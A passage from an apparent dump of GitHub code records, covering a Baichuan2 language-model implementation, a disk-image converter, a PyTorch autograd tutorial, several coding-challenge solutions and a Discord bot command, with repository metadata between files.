kv_seq_len += past_key_value[0].shape[-2]\n\n if past_key_value is not None:\n # reuse k, v, self_attention\n key_states = torch.cat([past_key_value[0], key_states], dim=2)\n value_states = torch.cat([past_key_value[1], value_states], dim=2)\n\n past_key_value = (key_states, value_states) if use_cache else None\n if xops is not None and self.training:\n attn_weights = None\n # query_states = query_states.transpose(1, 2)\n # key_states = key_states.transpose(1, 2)\n # value_states = value_states.transpose(1, 2)\n # attn_output = xops.memory_efficient_attention(\n # query_states, key_states, value_states, attn_bias=attention_mask\n # )\n with torch.backends.cuda.sdp_kernel(enable_flash=True, enable_math=True, enable_mem_efficient=True):\n attn_output = F.scaled_dot_product_attention(query_states, key_states, value_states, attn_mask = attention_mask)\n attn_output = attn_output.transpose(1, 2)\n else:\n attn_weights = torch.matmul(\n query_states, key_states.transpose(2, 3)\n ) / math.sqrt(self.head_dim)\n\n if attention_mask is not None:\n if q_len == 1: # inference with cache\n if len(attention_mask.size()) == 4:\n attention_mask = attention_mask[:, :, -1:, :]\n else:\n attention_mask = attention_mask[:, -1:, :]\n attn_weights = attn_weights + attention_mask\n attn_weights = torch.max(\n attn_weights, torch.tensor(torch.finfo(attn_weights.dtype).min)\n )\n\n attn_weights = torch.nn.functional.softmax(attn_weights, dim=-1)\n attn_output = torch.matmul(attn_weights, value_states)\n\n attn_output = attn_output.transpose(1, 2)\n attn_output = attn_output.reshape(bsz, q_len, self.hidden_size)\n attn_output = self.o_proj(attn_output)\n\n if not output_attentions:\n attn_weights = None\n\n return attn_output, attn_weights, past_key_value\n\n\nclass BaichuanLayer(torch.nn.Module):\n def __init__(self, config: BaichuanConfig,**kwargs):\n super().__init__()\n self.hidden_size = config.hidden_size\n global skip_init_function\n init_method = skip_init_function\n\n self.self_attn = BaichuanAttention(config=config,**kwargs)\n self.mlp = init_method(MLP,\n hidden_size=self.hidden_size,\n intermediate_size=config.intermediate_size,\n hidden_act=config.hidden_act,**kwargs\n )\n self.input_layernorm = RMSNorm(config.hidden_size, epsilon=config.rms_norm_eps,**kwargs)\n self.post_attention_layernorm = RMSNorm(\n config.hidden_size, epsilon=config.rms_norm_eps,**kwargs\n )\n\n def forward(\n self,\n hidden_states: 
torch.Tensor,\n attention_mask: Optional[torch.Tensor] = None,\n past_key_value: Optional[Tuple[torch.Tensor]] = None,\n output_attentions: Optional[bool] = False,\n use_cache: Optional[bool] = False,\n ) -> Tuple[\n torch.FloatTensor, Optional[Tuple[torch.FloatTensor, torch.FloatTensor]]\n ]:\n residual = hidden_states\n\n hidden_states = self.input_layernorm(hidden_states)\n\n # Self Attention\n hidden_states, self_attn_weights, present_key_value = self.self_attn(\n hidden_states=hidden_states,\n attention_mask=attention_mask,\n past_key_value=past_key_value,\n output_attentions=output_attentions,\n use_cache=use_cache,\n )\n hidden_states = residual + hidden_states\n\n # Fully Connected\n residual = hidden_states\n hidden_states = self.post_attention_layernorm(hidden_states)\n hidden_states = self.mlp(hidden_states)\n hidden_states = residual + hidden_states\n\n outputs = (hidden_states,)\n\n if use_cache:\n outputs += (present_key_value,)\n\n return outputs\n\n\nclass BaichuanPreTrainedModel(PreTrainedModel):\n config_class = BaichuanConfig\n base_model_prefix = \"model\"\n supports_gradient_checkpointing = True\n _no_split_modules = [\"BaichuanLayer\"]\n _keys_to_ignore_on_load_unexpected = [r\"decoder\\.version\"]\n\n def _init_weights(self, module):\n global skip_init_function\n init_method = skip_init_function\n if init_method == skip_init:\n return\n\n std = self.config.initializer_range\n if isinstance(module, torch.nn.Linear):\n module.weight.data.normal_(mean=0.0, std=std)\n if module.bias is not None:\n module.bias.data.zero_()\n elif isinstance(module, torch.nn.Embedding):\n module.weight.data.normal_(mean=0.0, std=std)\n if module.padding_idx is not None:\n module.weight.data[module.padding_idx].zero_()\n\n def _set_gradient_checkpointing(self, module, value=False):\n if isinstance(module, BaichuanModel):\n module.gradient_checkpointing = value\n\n def _get_resized_lm_head(\n self, old_lm_head: nn.Linear, new_num_tokens: Optional[int] = None, transposed: Optional[bool] = False\n ) :\n \"\"\"\n Build a resized Linear Module from a provided old Linear Module. Increasing the size will add newly initialized\n vectors at the end. Reducing the size will remove vectors from the end\n\n Args:\n old_lm_head (`torch.nn.Linear`):\n Old lm head liner layer to be resized.\n new_num_tokens (`int`, *optional*):\n New number of tokens in the linear matrix.\n\n Increasing the size will add newly initialized vectors at the end. Reducing the size will remove\n vectors from the end. If not provided or `None`, just returns a pointer to the input tokens\n `torch.nn.Linear` module of the model without doing anything. transposed (`bool`, *optional*, defaults\n to `False`): Whether `old_lm_head` is transposed or not. 
If True `old_lm_head.size()` is `lm_head_dim,\n vocab_size` else `vocab_size, lm_head_dim`.\n\n Return:\n `torch.nn.Linear`: Pointer to the resized Linear Module or the old Linear Module if `new_num_tokens` is\n `None`\n \"\"\"\n if new_num_tokens is None:\n return old_lm_head\n\n if is_deepspeed_zero3_enabled():\n import deepspeed\n\n with deepspeed.zero.GatheredParameters(old_lm_head.weight, modifier_rank=None):\n old_num_tokens, old_lm_head_dim = (\n old_lm_head.weight.size() if not transposed else old_lm_head.weight.t().size()\n )\n else:\n old_num_tokens, old_lm_head_dim = (\n old_lm_head.weight.size() if not transposed else old_lm_head.weight.t().size()\n )\n\n if old_num_tokens == new_num_tokens:\n return old_lm_head\n\n if not isinstance(old_lm_head, NormHead):\n raise TypeError(\n f\"Old language model head is of type {type(old_lm_head)}, which is not an instance of {nn.Linear}. You\"\n \" should either use a different resize function or make sure that `old_lm_head` are an instance of\"\n f\" {nn.Linear}.\"\n )\n\n # Build new lm head\n new_lm_head_shape = (old_lm_head_dim, new_num_tokens) if not transposed else (new_num_tokens, old_lm_head_dim)\n\n new_lm_head = NormHead(*new_lm_head_shape)\n new_lm_head = new_lm_head.to(old_lm_head.weight.device, dtype=old_lm_head.weight.dtype)\n\n # initialize new lm head (in particular added tokens)\n self._init_weights(new_lm_head)\n\n num_tokens_to_copy = min(old_num_tokens, new_num_tokens)\n\n # XXX: put the long block of code in a wrapper\n if is_deepspeed_zero3_enabled():\n import deepspeed\n\n params = [old_lm_head.weight, old_lm_head.bias, new_lm_head.weight, new_lm_head.bias]\n with deepspeed.zero.GatheredParameters(params, modifier_rank=0):\n if torch.distributed.get_rank() == 0:\n # Copy old lm head weights to new lm head\n if not transposed:\n new_lm_head.weight.data[:num_tokens_to_copy, :] = old_lm_head.weight.data[\n :num_tokens_to_copy, :\n ]\n else:\n new_lm_head.weight.data[:, :num_tokens_to_copy] = old_lm_head.weight.data[\n :, :num_tokens_to_copy\n ]\n\n\n else:\n # Copy old lm head weights to new lm head\n if not transposed:\n new_lm_head.weight.data[:num_tokens_to_copy, :] = old_lm_head.weight.data[:num_tokens_to_copy, :]\n else:\n new_lm_head.weight.data[:, :num_tokens_to_copy] = old_lm_head.weight.data[:, :num_tokens_to_copy]\n\n\n return new_lm_head\n\n\nclass BaichuanModel(BaichuanPreTrainedModel):\n def __init__(self, config: BaichuanConfig,**kwargs):\n super().__init__(config)\n self.padding_idx = config.pad_token_id\n self.vocab_size = config.vocab_size\n self.n_head = config.num_attention_heads\n\n global skip_init_function\n init_method = skip_init_function\n\n self.embed_tokens = init_method(torch.nn.Embedding,\n config.vocab_size, config.hidden_size, self.padding_idx,**kwargs\n )\n self.layers = torch.nn.ModuleList(\n [BaichuanLayer(config,**kwargs) for _ in range(config.num_hidden_layers)]\n )\n self.norm = RMSNorm(config.hidden_size, epsilon=config.rms_norm_eps,**kwargs)\n\n self.gradient_checkpointing = config.gradient_checkpointing\n self.post_init()\n self.max_cache_pos = config.model_max_length\n self.first_run = True\n self.alibi_mask = None\n\n def get_input_embeddings(self):\n return self.embed_tokens\n\n def set_input_embeddings(self, value):\n self.embed_tokens = value\n\n def get_alibi_mask(self, tensor, seq_length_with_past):\n if self.training:\n slopes = torch.Tensor(_get_interleave(self.n_head))\n position_point = (\n torch.arange(seq_length_with_past) - seq_length_with_past + 1\n )\n 
position_point = (\n position_point.unsqueeze(0)\n .unsqueeze(0)\n .expand(self.n_head, seq_length_with_past, -1)\n )\n diag = torch.diag(position_point[0])\n position_point = position_point - diag.unsqueeze(0).unsqueeze(0).transpose(\n -1, -2\n )\n alibi = slopes.unsqueeze(1).unsqueeze(1) * position_point\n mask = _buffered_future_mask(\n tensor, seq_length_with_past, alibi, self.n_head\n )\n else:\n if self.first_run:\n self.first_run = False\n self.register_buffer(\n \"future_mask\",\n _gen_alibi_mask(tensor, self.n_head, self.max_cache_pos).to(\n tensor\n ),\n persistent=False,\n )\n if seq_length_with_past > self.max_cache_pos:\n self.max_cache_pos = seq_length_with_past\n self.register_buffer(\n \"future_mask\",\n _gen_alibi_mask(tensor, self.n_head, self.max_cache_pos).to(\n tensor\n ),\n persistent=False,\n )\n mask = self.future_mask[\n : self.n_head, :seq_length_with_past, :seq_length_with_past\n ]\n return mask\n\n def forward(\n self,\n input_ids: torch.LongTensor = None,\n attention_mask: Optional[torch.Tensor] = None,\n past_key_values: Optional[List[torch.FloatTensor]] = None,\n inputs_embeds: Optional[torch.FloatTensor] = None,\n use_cache: Optional[bool] = False,\n output_attentions: Optional[bool] = False,\n output_hidden_states: Optional[bool] = False,\n return_dict: Optional[bool] = True,\n ) -> Union[Tuple, BaseModelOutputWithPast]:\n if input_ids is not None and inputs_embeds is not None:\n raise ValueError(\n \"You cannot provide both input_ids and inputs_embeds simultaneously\"\n )\n elif input_ids is not None:\n batch_size, seq_length = input_ids.shape\n elif inputs_embeds is not None:\n batch_size, seq_length, _ = inputs_embeds.shape\n else:\n raise ValueError(\"You need to provide input_ids or inputs_embeds\")\n\n return_dict = (\n return_dict if return_dict is not None else self.config.use_return_dict\n )\n\n seq_length_with_past = seq_length\n\n if past_key_values is not None:\n past_key_values_length = past_key_values[0][0].shape[2]\n seq_length_with_past = seq_length_with_past + past_key_values_length\n\n if inputs_embeds is None:\n inputs_embeds = self.embed_tokens(input_ids)\n\n if self.training:\n if (\n self.alibi_mask is None\n or self.alibi_mask.shape[-1] != seq_length_with_past\n ):\n self.alibi_mask = self.get_alibi_mask(\n inputs_embeds, seq_length_with_past\n )\n alibi_mask = self.alibi_mask\n else:\n alibi_mask = self.get_alibi_mask(inputs_embeds, seq_length_with_past)\n\n\n if attention_mask is not None:\n if len(attention_mask.shape) == 2:\n expanded_mask = attention_mask.to(alibi_mask.dtype)\n expanded_mask = torch.tril(\n torch.gt(expanded_mask[:, :, None] * expanded_mask[:, None, :], 0)\n ) * torch.eq(expanded_mask[:, :, None] - expanded_mask[:, None, :], 0)\n else:\n expanded_mask = attention_mask\n bsz = inputs_embeds.size(0)\n src_len, tgt_len = alibi_mask.size()[-2:]\n expanded_mask = (\n expanded_mask.unsqueeze(1)\n .expand(bsz, 1, src_len, tgt_len)\n .to(alibi_mask.dtype)\n )\n inverted_mask = 1.0 - expanded_mask\n inverted_mask = inverted_mask.masked_fill(\n inverted_mask.to(torch.bool), torch.finfo(alibi_mask.dtype).min\n )\n attention_mask = inverted_mask + alibi_mask.unsqueeze(0)\n else:\n attention_mask = alibi_mask\n\n if attention_mask.size(-2) != seq_length:\n attention_mask = attention_mask[...,-seq_length:,:]\n\n hidden_states = inputs_embeds\n\n if self.gradient_checkpointing and self.training:\n if use_cache:\n logger.warning_once(\n \"`use_cache=True` is incompatible with gradient checkpointing. 
Setting `use_cache=False`...\"\n )\n use_cache = False\n\n # decoder layers\n all_hidden_states = () if output_hidden_states else None\n all_self_attns = () if output_attentions else None\n next_decoder_cache = () if use_cache else None\n\n for idx, decoder_layer in enumerate(self.layers):\n if output_hidden_states:\n all_hidden_states += (hidden_states,)\n\n past_key_value = (\n past_key_values[idx] if past_key_values is not None else None\n )\n\n if self.gradient_checkpointing and self.training:\n\n def create_custom_forward(module):\n def custom_forward(*inputs):\n # None for past_key_value\n return module(*inputs, output_attentions, None)\n\n return custom_forward\n\n layer_outputs = torch.utils.checkpoint.checkpoint(\n create_custom_forward(decoder_layer),\n hidden_states,\n attention_mask,\n past_key_value,\n )\n else:\n layer_outputs = decoder_layer(\n hidden_states,\n attention_mask=attention_mask,\n past_key_value=past_key_value,\n output_attentions=output_attentions,\n use_cache=use_cache,\n )\n\n hidden_states = layer_outputs[0]\n\n if use_cache:\n next_decoder_cache += (layer_outputs[2 if output_attentions else 1],)\n\n if output_attentions:\n all_self_attns += (layer_outputs[1],)\n\n hidden_states = self.norm(hidden_states)\n\n # add hidden states from the last decoder layer\n if output_hidden_states:\n all_hidden_states += (hidden_states,)\n\n next_cache = next_decoder_cache if use_cache else None\n if not return_dict:\n return tuple(\n v\n for v in [hidden_states, next_cache, all_hidden_states, all_self_attns]\n if v is not None\n )\n return BaseModelOutputWithPast(\n last_hidden_state=hidden_states,\n past_key_values=next_cache,\n hidden_states=all_hidden_states,\n attentions=all_self_attns,\n )\n\n\nclass NormHead(nn.Module):\n def __init__(self, hidden_size, vocab_size, bias=False):\n super().__init__()\n self.weight = nn.Parameter(torch.empty((vocab_size, hidden_size)))\n nn.init.kaiming_uniform_(self.weight, a=math.sqrt(5))\n self.first_flag = True\n\n def forward(self, hidden_states):\n if self.training:\n norm_weight = nn.functional.normalize(self.weight)\n elif self.first_flag:\n self.first_flag = False\n self.weight.data = nn.functional.normalize(self.weight)\n norm_weight = self.weight\n else:\n norm_weight = self.weight\n return nn.functional.linear(hidden_states, norm_weight)\n\n_init_weights = True\n@contextmanager\ndef no_init_weights(_enable=True):\n global _init_weights\n old_init_weights = _init_weights\n if _enable:\n _init_weights = False\n try:\n yield\n finally:\n _init_weights = old_init_weights\n\n\nclass BaichuanForCausalLM(BaichuanPreTrainedModel):\n def __init__(self, config, *model_args, **model_kwargs):\n super().__init__(config, *model_args, **model_kwargs)\n self.model = BaichuanModel(config)\n self.lm_head = NormHead(config.hidden_size, config.vocab_size, bias=False)\n self.quantized = False\n method = getattr(config, \"quantization_method\", \"cpm\")\n if method == \"cpm\":\n if getattr(config, \"quantization_bit\", 0) in [4, 8]:\n self.quantize(config.quantization_bit, empty_init=True)\n elif method == \"bnb\":\n if hasattr(config, \"quantization_config\") and config.quantization_config['load_in_4bit']:\n self.quantize_bnb(4)\n # Initialize weights and apply final processing\n self.post_init()\n\n def get_input_embeddings(self):\n return self.model.embed_tokens\n\n def set_input_embeddings(self, value):\n self.model.embed_tokens = value\n\n def get_output_embeddings(self):\n return self.lm_head\n\n def set_output_embeddings(self, 
new_embeddings):\n self.lm_head = new_embeddings\n\n def set_decoder(self, decoder):\n self.model = decoder\n\n def get_decoder(self):\n return self.model\n \n @classmethod\n def from_pretrained(\n cls,\n pretrained_model_name_or_path: Optional[Union[str, os.PathLike]],\n *model_args,\n config: Optional[Union[PretrainedConfig, str, os.PathLike]] = None,\n cache_dir: Optional[Union[str, os.PathLike]] = None,\n ignore_mismatched_sizes: bool = False,\n force_download: bool = False,\n local_files_only: bool = False,\n token: Optional[Union[str, bool]] = None,\n revision: str = \"main\",\n use_safetensors: bool = None,\n **kwargs,\n ):\n \n # Load config if we don't provide a configuration\n if not isinstance(config, PretrainedConfig):\n config_path = config if config is not None else pretrained_model_name_or_path\n config, model_kwargs = cls.config_class.from_pretrained(\n config_path,\n cache_dir=cache_dir,\n return_unused_kwargs=True,\n force_download=force_download,\n resume_download=False,\n proxies=None,\n local_files_only=local_files_only,\n token=token,\n revision=revision,\n subfolder=\"\",\n _from_auto=False,\n _from_pipeline=None,\n **kwargs,\n )\n else:\n model_kwargs = kwargs\n\n method = getattr(config, \"quantization_method\", \"cpm\")\n if method == \"bnb\" and getattr(config, \"quantization_config\",None) and config.quantization_config['load_in_4bit']:\n try:\n from .quantizer import init_model_weight_int4\n from accelerate import init_empty_weights, dispatch_model, infer_auto_device_map\n from accelerate.utils import CustomDtype\n from accelerate.utils import get_balanced_memory\n except ImportError:\n raise ImportError(f\"Needs import model weight init func to run quantize.\") \n # Instantiate model.\n init_contexts = [no_init_weights(_enable=True)]\n init_contexts.append(init_empty_weights())\n with ContextManagers(init_contexts):\n model = cls(config)\n\n def load_model_from_multiple_files(input_dir):\n state_dict = {}\n for file_name in glob.iglob(f\"{input_dir}/pytorch_model*.bin\"):\n chunk_state_dict = torch.load(file_name, map_location='cpu')\n state_dict.update(chunk_state_dict)\n return state_dict\n\n # model_file = os.path.join(pretrained_model_name_or_path, 'pytorch_model.bin')\n # state_dict = torch.load(model_file, map_location=\"cpu\")\n state_dict = load_model_from_multiple_files(pretrained_model_name_or_path)\n model.is_quantized = True\n \n device_map = kwargs.pop(\"device_map\", None)\n torch_dtype = kwargs.pop(\"torch_dtype\", None)\n if device_map is not None:\n kwargs = {\"no_split_module_classes\": model._no_split_modules}\n target_dtype = CustomDtype.INT4\n max_memory = get_balanced_memory(\n model,\n dtype=target_dtype,\n low_zero=(device_map == \"balanced_low_0\"),\n max_memory=None,\n **kwargs,\n )\n kwargs[\"max_memory\"] = max_memory\n device_map = infer_auto_device_map(model, dtype=target_dtype, **kwargs)\n model = init_model_weight_int4(config, model, state_dict)\n \n # Set model in evaluation mode to deactivate DropOut modules by default\n model.eval()\n # If it is a model with generation capabilities, attempt to load the generation config\n if model.can_generate():\n try:\n model.generation_config = GenerationConfig.from_pretrained(\n pretrained_model_name_or_path,\n cache_dir=cache_dir,\n force_download=force_download,\n resume_download=False,\n proxies=None,\n local_files_only=local_files_only,\n token=token,\n revision=revision,\n subfolder=\"\",\n _from_auto=False,\n _from_pipeline=None,\n **kwargs,\n )\n except (OSError, TypeError):\n 
logger.info(\n \"Generation config file not found, using a generation config created from the model config.\"\n )\n pass\n \n if device_map is not None:\n dispatch_model(model, device_map=device_map)\n \n return model\n\n return super(BaichuanForCausalLM, cls).from_pretrained(pretrained_model_name_or_path, *model_args, \n config=config, cache_dir=cache_dir, ignore_mismatched_sizes=ignore_mismatched_sizes, \n force_download=force_download, local_files_only=local_files_only, token=token, revision=revision, \n use_safetensors=use_safetensors, **kwargs)\n\n def forward(\n self,\n input_ids: torch.LongTensor = None,\n attention_mask: Optional[torch.Tensor] = None,\n past_key_values: Optional[List[torch.FloatTensor]] = None,\n inputs_embeds: Optional[torch.FloatTensor] = None,\n labels: Optional[torch.LongTensor] = None,\n use_cache: Optional[bool] = None,\n output_attentions: Optional[bool] = False,\n output_hidden_states: Optional[bool] = False,\n return_dict: Optional[bool] = True,\n **kwargs,\n ) -> Union[Tuple, CausalLMOutputWithPast]:\n return_dict = (\n return_dict if return_dict is not None else self.config.use_return_dict\n )\n\n # decoder outputs consists of (dec_features, layer_state, dec_hidden, dec_attn)\n outputs = self.model(\n input_ids=input_ids,\n attention_mask=attention_mask,\n past_key_values=past_key_values,\n inputs_embeds=inputs_embeds,\n use_cache=use_cache,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n return_dict=return_dict,\n )\n\n hidden_states = outputs[0]\n logits = self.lm_head(hidden_states)\n loss = None\n if labels is not None:\n # Shift so that tokens < n predict n\n shift_logits = logits[..., :-1, :].contiguous()\n shift_labels = labels[..., 1:].contiguous()\n # Flatten the tokens\n loss_fct = CrossEntropyLoss()\n shift_logits = shift_logits.view(-1, self.config.vocab_size)\n shift_labels = shift_labels.view(-1)\n softmax_normalizer = shift_logits.max(-1).values ** 2\n z_loss = self.config.z_loss_weight * softmax_normalizer.mean()\n # Enable model parallelism\n shift_labels = shift_labels.to(shift_logits.device)\n loss = loss_fct(shift_logits, shift_labels) + z_loss\n\n if not return_dict:\n output = (logits,) + outputs[1:]\n return (loss,) + output if loss is not None else output\n\n return CausalLMOutputWithPast(\n loss=loss,\n logits=logits,\n past_key_values=outputs.past_key_values,\n hidden_states=outputs.hidden_states,\n attentions=outputs.attentions,\n )\n\n def quantize_bnb(self, bits: int):\n try:\n from .quantizer import quantize_online\n except ImportError:\n raise ImportError(f\"Needs QLinear to run quantize.\")\n return quantize_online(self, bits)\n\n def quantize(self, bits: int, empty_init=False, device=None, **kwarg):\n if bits == 0:\n return\n from .quantization import quantize\n if self.quantized:\n logger.info(\"Already quantized.\")\n return self\n quantize(self, bits=bits, empty_init=empty_init, device=device, **kwarg)\n self.config.quantization_bit = bits\n self.quantized = True\n return self\n\n \n def prepare_inputs_for_generation(\n self,\n input_ids: torch.LongTensor,\n past_key_values: Optional[torch.Tensor] = None,\n attention_mask: Optional[torch.Tensor] = None,\n inputs_embeds: Optional[torch.Tensor] = None,\n **kwargs,\n ):\n if past_key_values:\n input_ids = input_ids[:, -1:]\n\n # if `inputs_embeds` are passed, we only want to use them in the 1st generation step\n if inputs_embeds is not None and past_key_values is None:\n model_inputs = {\"inputs_embeds\": inputs_embeds}\n else:\n 
model_inputs = {\"input_ids\": input_ids}\n\n model_inputs.update(\n {\n \"past_key_values\": past_key_values,\n \"use_cache\": kwargs.get(\"use_cache\"),\n \"attention_mask\": attention_mask,\n }\n )\n return model_inputs\n\n @staticmethod\n def _reorder_cache(past_key_values, beam_idx):\n return tuple(\n tuple(past_state.index_select(0, beam_idx) for past_state in layer_past)\n for layer_past in past_key_values\n )\n\n def _build_chat_input(\n self, tokenizer, messages: List[dict], max_new_tokens: int = 0\n ):\n max_new_tokens = max_new_tokens or self.generation_config.max_new_tokens\n max_input_tokens = self.config.model_max_length - max_new_tokens\n max_input_tokens = max(self.config.model_max_length // 2, max_input_tokens)\n total_input, round_input = [], []\n for i, message in enumerate(messages[::-1]):\n content_tokens = tokenizer.encode(message[\"content\"])\n if message[\"role\"] == \"user\":\n round_input = (\n [self.generation_config.user_token_id]\n + content_tokens\n + round_input\n )\n if (\n total_input\n and len(total_input) + len(round_input) > max_input_tokens\n ):\n break\n else:\n total_input = round_input + total_input\n if len(total_input) >= max_input_tokens:\n break\n else:\n round_input = []\n elif message[\"role\"] == \"assistant\":\n round_input = (\n [self.generation_config.assistant_token_id]\n + content_tokens\n + [self.generation_config.eos_token_id]\n + round_input\n )\n else:\n raise ValueError(f\"message role not supported yet: {message['role']}\")\n total_input = total_input[-max_input_tokens:] # truncate left\n total_input.append(self.generation_config.assistant_token_id)\n total_input = torch.LongTensor([total_input]).to(self.device)\n return total_input\n\n def chat(self, tokenizer, messages: List[dict], stream=False,\n generation_config: Optional[GenerationConfig]=None,**kwargs):\n generation_config = generation_config or self.generation_config\n input_ids = build_chat_input(self, tokenizer, messages, generation_config.max_new_tokens)\n if stream:\n streamer = TextIterStreamer(tokenizer, skip_prompt=True, skip_special_tokens=True)\n Thread(target=self.generate, kwargs=dict(\n inputs=input_ids, streamer=streamer,\n generation_config=generation_config,**kwargs\n )).start()\n return streamer\n else:\n outputs = self.generate(input_ids, generation_config=generation_config,**kwargs)\n response = tokenizer.decode(outputs[0][len(input_ids[0]):], skip_special_tokens=True)\n return response\n","repo_name":"ssbuild/deep_training","sub_path":"src/deep_training/nlp/models/baichuan2_13b/modeling_baichuan.py","file_name":"modeling_baichuan.py","file_ext":"py","file_size_in_byte":38357,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"32"} +{"seq_id":"6250420136","text":"import sys\n\ndef read_dim_file(dim_name):\n with open(dim_name, \"rb\") as f:\n xdf_bytes = bytearray()\n header_bytes = f.read(0x100)\n if header_bytes[0xab:0xaf] != bytes('DIFC',encoding='utf-8'):\n print(\"not DIM format (dim_name)\")\n return None\n if header_bytes[0] != 0:\n print(\"unknown format.\")\n return None\n for i in range(154):\n n = header_bytes[i+1]\n if (n > 0):\n xdf_bytes += f.read(0x2000)\n else:\n xdf_bytes += bytes([0]*0x2000)\n return xdf_bytes\n\ndef write_xdf_image(xdf_name, xdf_bytes):\n if len(xdf_bytes) != 154 * 0x2000:\n print(\"not XDF image.\")\n return\n with open(xdf_name, \"wb\") as f:\n f.write(xdf_bytes)\n\ndef main():\n if len(sys.argv) < 3:\n print(\"usage: dim2xdf \")\n return 1\n\n xdf_bytes = 
read_dim_file(sys.argv[1])\n if xdf_bytes != None:\n write_xdf_image(sys.argv[2],xdf_bytes)\n\nif __name__ == \"__main__\":\n main()","repo_name":"tantanGH/dim2xdf","sub_path":"dim2xdf/dim2xdf.py","file_name":"dim2xdf.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"9242383294","text":"# So far, just like we did in autograd.py, we have implemented\n# the computational graph and made each operation to do\n# forward pass and backward pass. (I wrote this)\n\n# Each primitive autograd operator is really two functions\n# that operate on Tensors, forward and backward function.\n# We can easily define our own autograd operator by defining\n# a subclass of torch.autograd.Function. We can then use\n# our new autograd operator by constructiing an instance\n# and calling it like a function, passing Variables containing\n# input data.\nimport torch\nfrom torch.autograd import Variable\n\nclass MyReLU(torch.autograd.Function):\n \"\"\"\n We can implement our own custom autograd Functions by subclassing\n torch.autograd.Function and impelmenting the forward and backward passes\n which operate on Tensors.\n \"\"\"\n def forward(self, input):\n\n self.save_for_backward(input)\n return input.clamp(min=0)\n\n def backward(self, grad_output):\n\n # , only applies to a vector of the shape (1,n) to make the vector (n,1)\n # Note! , does not apply to the vector of the shape (n,1) or any other shape.\n input, = self.saved_tensors\n\n # Tensor.clone() returns a copy of the tensor.\n # Note it is not Variable.clone()\n grad_input = grad_output.clone()\n grad_input[input < 0] = 0\n return grad_input\n\nN, D_in, H, D_out = 64, 1000, 100, 10\n\n# Create random Tensors to hold input and outputs, and wrap them in Variables.\nx = Variable(torch.randn(N, D_in), requires_grad=False)\ny = Variable(torch.randn(N, D_out), requires_grad=False)\n\n# Create random Tensors for weights, and wrap them in Variables.\nw1 = Variable(torch.randn(D_in, H), requires_grad=True)\nw2 = Variable(torch.randn(H, D_out), requires_grad=True)\n\nlearning_rate = 1e-6\n\nfor t in range(500):\n # Construct an instance of our MyReLU class to use in our network\n relu = MyReLU()\n\n # Forward pass: compute predicted y using operations on Variables; we compute\n # ReLU using our custom autograd operation.\n y_pred = relu(x.mm(w1)).mm(w2)\n\n # Compute and print loss\n loss = (y_pred - y).pow(2).sum()\n print(t, loss.data[0])\n\n # Use autograd to compute the backward pass.\n loss.backward()\n\n # Update weights using gradient descent\n w1.data -= learning_rate * w1.grad.data\n w2.data -= learning_rate * w2.grad.data\n\n # Manually zero the gradients after updating weights\n w1.grad.data.zero_()\n w2.grad.data.zero_()\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"perryhow13/PyTorch-Tutorials","sub_path":"LeariningPyTorchWithExamples/define_new_auto_func.py","file_name":"define_new_auto_func.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74606594652","text":"class Solution:\n def matrixScore(self, A: List[List[int]]) -> int:\n M, N = len(A), len(A[0])\n res = (1 << N - 1) * M\n for j in range(1, N):\n cur = 0\n for i in range(M):\n if A[i][j] == A[i][0]:\n cur += 1\n # print(A[i], j, i)\n # print(A[i][j], A[i][0], cur)\n # cur = sum(A[i][j] == A[i][0] for i in range(M))\n res += max(cur, M - cur) * (1 << N - 1 - j)\n print(cur, M-cur, (1 << 
N-1-j))\n return res","repo_name":"kevinjshah2207/LeetCode_Summer_21","sub_path":"score-after-flipping-matrix/score-after-flipping-matrix.py","file_name":"score-after-flipping-matrix.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"24283558646","text":"import random\nimport re\nimport discord\n\nimport jb2.command\nimport jb2.embed\n\n\nclass AskCommand(jb2.command.Command):\n def __init__(self, connector):\n with open('res/text/odpowiedzi.txt') as file:\n self.answers = file.readlines()\n\n def get_pattern(self):\n return r'ask( .+)?$'\n\n async def action(self, prefix, message, client):\n msg = message.content.strip()\n author_m = message.author.mention\n pattern = self.get_full_pattern(prefix)\n\n question = re.match(\"^\" + pattern, msg).group(1)\n\n if question is None:\n text = \"Potrzebny parametr: **question**\"\n emb = jb2.embed.error_embed(author_m, text)\n else:\n emoji = \":8ball:\"\n emb = jb2.embed.embed(emoji, author_m, random.choice(self.answers))\n emb.colour = 0x007777\n\n await client.send_message(message.channel, embed=emb)\n","repo_name":"spirdon/janbot2","sub_path":"jb2/text/ask.py","file_name":"ask.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71073494812","text":"#!/bin/python3\n\nimport sys\n\norde = ord(\"a\") - 1\ns = input().strip()\ntab = set()\ntmp = 0\nfor a in s:\n if (a != tmp):\n tmp = a\n lena = 1\n tab.add(ord(a) - orde)\n else:\n lena +=1\n tab.add(lena * (ord(a) - orde))\nn = int(input().strip())\nfor a0 in range(n):\n x = int(input().strip())\n print(\"Yes\" if (x in tab) else \"No\")\n","repo_name":"lvoneduval/hackerrank","sub_path":"Algorithms/Strings/07_Weighted_Uniform_Strings.py","file_name":"07_Weighted_Uniform_Strings.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1973363077","text":"import pygame\nfrom newBoard import *\n\n\nclass PathFinder:\n def __init__(self, Board, start, end) -> None:\n self.tree = []\n self.closedList = []\n self.finalPath = []\n self.board = Board\n self.start = start # Should be the index of the pieces list \n self.end = end # Should also be the index of the pieces list. 
